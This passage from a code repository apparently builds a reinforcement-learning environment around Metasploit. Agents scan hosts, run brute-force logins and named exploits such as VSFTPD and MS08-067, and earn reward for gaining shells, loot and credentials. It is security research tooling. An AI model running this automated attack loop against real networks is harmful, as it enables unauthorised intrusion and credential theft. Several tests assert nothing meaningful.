pull info for hosts in order 193 | # first check if we have open sessions and organize them by host 194 | # return new reward 195 | reward = 0 196 | open_meterpreter_sessions = {} 197 | open_console_sessions = {} 198 | 199 | session_keys = self.client.sessions.list 200 | for sid in session_keys: 201 | if session_keys[sid]["type"] == "meterpreter": 202 | hostname = session_keys[sid]["target_host"] 203 | open_meterpreter_sessions[hostname] = session_keys[sid] 204 | if session_keys[sid]["type"] == "shell": 205 | hostname = session_keys[sid]["target_host"] 206 | open_console_sessions[hostname] = session_keys[sid] 207 | 208 | hosts = ( 209 | self.client.db.workspaces.current.hosts.list 210 | ) # list of hosts we know about 211 | for host in hosts: 212 | address = host["address"] 213 | services = self.client.db.workspaces.current.services.find( 214 | addresses=[address] 215 | ) # list of services for those hosts 216 | vulns = self.client.db.workspaces.current.vulns.find( 217 | addresses=[address] 218 | ) # list of exploited vulns so far 219 | loot = self.client.db.workspaces.current.loots.find( 220 | addresses=[address] 221 | ) # loot taken from machines 222 | creds = self.client.db.workspaces.current.creds.find( 223 | addresses=[address] 224 | ) # credentials discovered 225 | if address in open_meterpreter_sessions: 226 | has_session = 1 227 | else: 228 | has_session = 0 229 | if address in open_console_sessions: 230 | has_console = 1 231 | else: 232 | has_console = 0 233 | # CALCULATE BOARD ADDRESS 234 | board_address = self.calculate_board_address(ip=address) 235 | if board_address: 236 | potential_host = Host( 237 | board_address=board_address, 238 | ip_address=address, 239 | services=services, 240 | vulns=vulns, 241 | loot=loot, 242 | creds=creds, 243 | console=has_console, 244 | session=has_session, 245 | vector_size=self.network.host_vector_size, 246 | ) 247 | else: 248 | continue 249 | if self.network.check_host_exists(potential_host.board_address) is True: 250 | reward
+= self.network.compare_updated_host(potential_host) 251 | self.network.update_host(potential_host) 252 | else: 253 | reward += self.network.add_host(potential_host) 254 | # need to find way to derive privileges 255 | return reward 256 | 257 | def step(self, action): 258 | """ 259 | This function validates the action that is to be taken, making sure it is a legal action. 260 | That includes that the subnet and host exist in the lookup table, and that the action can correctly be applied to the host. 261 | :param action: an object of type Action 262 | :return: Observation, reward, done, debug info 263 | """ 264 | if not issubclass(type(action), Action): 265 | raise TypeError( 266 | "Only actions of type Action can be processed by the MetasploitNetworkEnv" 267 | ) 268 | board_addr_to_host = dict( 269 | [(value, key) for key, value in self.host_dict.items()] 270 | ) 271 | 272 | if action.target in board_addr_to_host: 273 | host_addr = board_addr_to_host[action.target] 274 | else: 275 | raise KeyError( 276 | f"Chosen target {action.target} does not exist in current host_dict" 277 | ) 278 | print(action) 279 | action.execute(self.client, host_addr) 280 | time.sleep(5) # let end of execution play out, for example VSFTPD 281 | # use kwargs to just pass all the info we have and let the action decide what it needs? 
        # load relevant service port
        # - the host the action is being taken against
        reward = self.update_env()  # update env
        # calculate reward based on
        debugging_info = {}
        return self.network.vectorize(), reward, self.goal_reached(), debugging_info

    def reset(self):
        # reset data structures that make up network
        # return initial observation
        self.host_dict = {self.target_host: (0, 0)}
        self.tcp_services = dict()
        self.udp_services = dict()
        self.privileges = dict()
        self.loot = dict()
        self.network = Network(
            max_subnets=self.max_subnets,
            max_hosts_per_subnet=self.max_hosts_per_subnet,
            num_exploits=len(self.action_space),
        )
        # sessions have to be removed separately, so close them
        for session in self.client.sessions.list:
            session_obj = self.client.sessions.session(session)
            session_obj.stop()
        # reset client database by removing current workspace, then add new workspace with same name
        self.client.db.workspaces.remove("metasploitgym")
        # then add a new one
        self.client.db.workspaces.add("metasploitgym")
        self.client.db.workspaces.set("metasploitgym")
        self.environment_reset_function()
        return self.network.vectorize()

    def goal_reached(self):
        # check to see if all hosts have network access
        if self.network.hosts == []:
            return False
        for host in self.network.hosts:
            if host.meterpreter_shell == 0 and host.open_console == 0:
                return False
        return True


class MetasploitSimulatorEnv(MetasploitEnv):
    # TODO: Build Simulator Environment as POMDP
    def __init__(self):
        raise NotImplementedError


class FlatActionSpace(spaces.Discrete):
    """Flat Action space"""

    def __init__(self, max_subnets, max_hosts_per_subnet):
        self.max_subnets = max_subnets
        self.max_hosts_per_subnet = max_hosts_per_subnet
        self.actions = self.generate_action_list()
        super().__init__(len(self.actions))

    def generate_action_list(self):
        # need to generate each possible action for each possible host
        # requires network description
        action_list = []
        for i in range(self.max_subnets):
            for j in range(self.max_hosts_per_subnet):
                host_idx = (i, j)
                for ScanAction in Scan.__subclasses__():
                    scan = ScanAction(host_idx)
                    action_list.append(scan)
                for ExploitAction in Exploit.__subclasses__():
                    action = ExploitAction(host_idx)
                    action_list.append(action)
        return action_list

    def get_action(self, action_idx):
        """Action has to be an index"""
        assert isinstance(
            action_idx, int
        ), "When using a flat action space must be an integer"
        assert action_idx <= len(self.actions) - 1, "Action can't be longer than list"
        return self.actions[action_idx]

    def __len__(self):
        return len(self.actions)

--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
# Example configuration for Black.

# NOTE: you have to use single-quoted strings in TOML for regular expressions.
# It's the equivalent of r-strings in Python. Multiline strings are treated as
# verbose regular expressions by Black. Use [ ] to denote a significant space
# character.

[tool.black]
line-length = 88
target-version = ['py36', 'py37', 'py38']
include = '\.pyi?$'

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
attrs==21.2.0
certifi==2021.5.30
chardet==4.0.0
cloudpickle==1.6.0
decorator==5.0.9
gym==0.18.3
idna==2.10
iniconfig==1.1.1
msgpack==1.0.2
numpy==1.21.0
packaging==20.9
Pillow==8.2.0
pluggy==0.13.1
py==1.10.0
pyglet==1.5.15
git+https://github.com/DanMcInerney/pymetasploit3.git@498d65f1cd132b62071b78df9dc95fa987abf39e#egg=pymetasploit3
pyparsing==2.4.7
pytest==6.2.4
python-dotenv==0.18.0
requests==2.25.1
retry==0.9.2
scipy==1.7.0
toml==0.10.2
urllib3==1.26.6

--------------------------------------------------------------------------------
/tests/test_agent.py:
--------------------------------------------------------------------------------
import pytest
from metasploit_gym.metasploit_env import MetasploitNetworkEnv
from dotenv import load_dotenv
import os

load_dotenv()
METASPLOIT_PASS = os.getenv("METASPLOIT_PASSWORD", default=None)
METASPLOIT_PORT = os.getenv("METASPLOIT_PORT", default=None)
METASPLOIT_HOST = os.getenv("METASPLOIT_HOST", default=None)


@pytest.fixture()
def network_env():
    network_env = MetasploitNetworkEnv(
        msf_host=METASPLOIT_HOST,
        msf_rpc_password=METASPLOIT_PASS,
        msf_rpc_port=METASPLOIT_PORT,
    )  # maybe host config as argument here
    yield network_env
    network_env.reset()

--------------------------------------------------------------------------------
/tests/test_connection.py:
--------------------------------------------------------------------------------
import pytest
from metasploit_gym.metasploit_env import MetasploitNetworkEnv
from metasploit_gym.action.scan import PortScan
from metasploit_gym.action.exploit import (
    SSH_Bruteforce,
    FTP_Bruteforce,
    SMB_Bruteforce,
    Telnet_Bruteforce,
    VSFTPD,
    JavaRMIServer,
    Ms08_067_Netapi,
    ManageEngine_Auth_Upload,
    ApacheJamesExecution,
)
from pymetasploit3.msfrpc import MsfRpcClient
from pymetasploit3.msfrpc import MsfRpcMethod
import os
from dotenv import load_dotenv

load_dotenv()
METASPLOIT_PASS = os.getenv("METASPLOIT_PASSWORD", default=None)
METASPLOIT_PORT = os.getenv("METASPLOIT_PORT", default=None)
METASPLOIT_HOST = os.getenv("METASPLOIT_HOST", default=None)

if METASPLOIT_HOST is None or METASPLOIT_PORT is None or METASPLOIT_PASS is None:
    raise ValueError(
        "Please include a .env file with METASPLOIT_PASSWORD, METASPLOIT_PORT, and METASPLOIT_HOST set to the values of the msgrpc service"
    )


@pytest.fixture()
def client():
    client = MsfRpcClient(
        METASPLOIT_PASS, server=METASPLOIT_HOST, port=METASPLOIT_PORT, ssl=True
    )
    yield client
    client.call(MsfRpcMethod.AuthLogout)


@pytest.fixture()
def network_env():
    network_env = MetasploitNetworkEnv()  # maybe host config as argument here
    yield network_env
    network_env.reset()


def test_connection(client):
    """
    Test whether we can connect to the metasploit server
    """
    assert [m for m in dir(client) if not m.startswith("_")] != []


def test_db_connection(client):
    """
    Test whether there's a persistent connection to the database
    """
    default_workspace = client.db.workspaces.list[0]
    assert default_workspace["name"] == "default"


def test_network_scan(network_env):
    """
    Test scanning in the real network and assume port 22 is open
    """
    action = PortScan()
    network_env.step(action)
    assert 1 == 1


def test_ssh_scan(network_env):
    """
    Test ssh module execution
    """
    action = SSH_Bruteforce()
    network_env.step(action)
    assert 1 == 1


def test_ftp_scan(network_env):
    """
    Test ftp module execution
    """
    action = FTP_Bruteforce()
    network_env.step(action)
    assert 1 == 1


def test_smb_scan(network_env):
    action = SMB_Bruteforce()
    network_env.step(action)
    assert 1 == 1


def test_telnet_scan(network_env):
    action = Telnet_Bruteforce()
    network_env.step(action)
    assert 1 == 1


def test_vsftpd_exploit(network_env):
    action = VSFTPD()
    network_env.step(action)
    assert 1 == 1


def test_java_rmi_server(network_env):
    action = JavaRMIServer()
    network_env.step(action)
    assert 1 == 1


def test_ms08_067_netapi(network_env):
    action = Ms08_067_Netapi()
    network_env.step(action)
    assert 1 == 1


def test_manageengine_auth_upload(network_env):
    action = ManageEngine_Auth_Upload()
    network_env.step(action)
    assert 1 == 1


def test_apache_james_auth_upload(network_env):
    action = ApacheJamesExecution()
    network_env.step(action)
    assert 1 == 1


def test_env_update(network_env):
    network_env.update_env()
    print(network_env.network.vectorize())


def test_env_reset(network_env):
    action = ApacheJamesExecution()
    network_env.step(action)
    network_env.update_env()
    network_env.reset()

--------------------------------------------------------------------------------
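The flat action space in `metasploit_env.py` enumerates one action object per (subnet, host) board address and action type, and an agent selects an action by integer index. The sketch below illustrates that indexing scheme in isolation so it can run without a Metasploit RPC service. It is not the repository's code: `Action`, `PortScan`, and `VSFTPD` are hypothetical stand-ins that only record their target, and `build_flat_actions` and `lookup_action` are illustrative helper names.

```python
from itertools import product


class Action:
    """Hypothetical stand-in for an action; it only records its target."""

    def __init__(self, target):
        self.target = target  # (subnet_index, host_index) board address

    def __repr__(self):
        return f"{type(self).__name__}(target={self.target})"


class PortScan(Action):
    """Stand-in scan action (assumption, not the real class)."""


class VSFTPD(Action):
    """Stand-in exploit action (assumption, not the real class)."""


def build_flat_actions(max_subnets, max_hosts_per_subnet, action_types):
    """Create one action per board address and action type, in a fixed order."""
    return [
        action_type((subnet, host))
        for subnet, host in product(range(max_subnets), range(max_hosts_per_subnet))
        for action_type in action_types
    ]


def lookup_action(actions, action_idx):
    """Map a discrete index chosen by an agent back to an action object."""
    if not isinstance(action_idx, int):
        raise TypeError("a flat action space is indexed by integers")
    if not 0 <= action_idx < len(actions):
        raise IndexError(f"action index {action_idx} is out of range")
    return actions[action_idx]


# 2 subnets x 2 hosts x 2 action types = 8 actions in total
actions = build_flat_actions(
    max_subnets=2, max_hosts_per_subnet=2, action_types=[PortScan, VSFTPD]
)
chosen = lookup_action(actions, 3)
print(len(actions), chosen)
```

In this sketch the lookup raises exceptions instead of using `assert`, so the bounds check stays active when Python runs with `-O`, and negative indices are rejected rather than silently wrapping around.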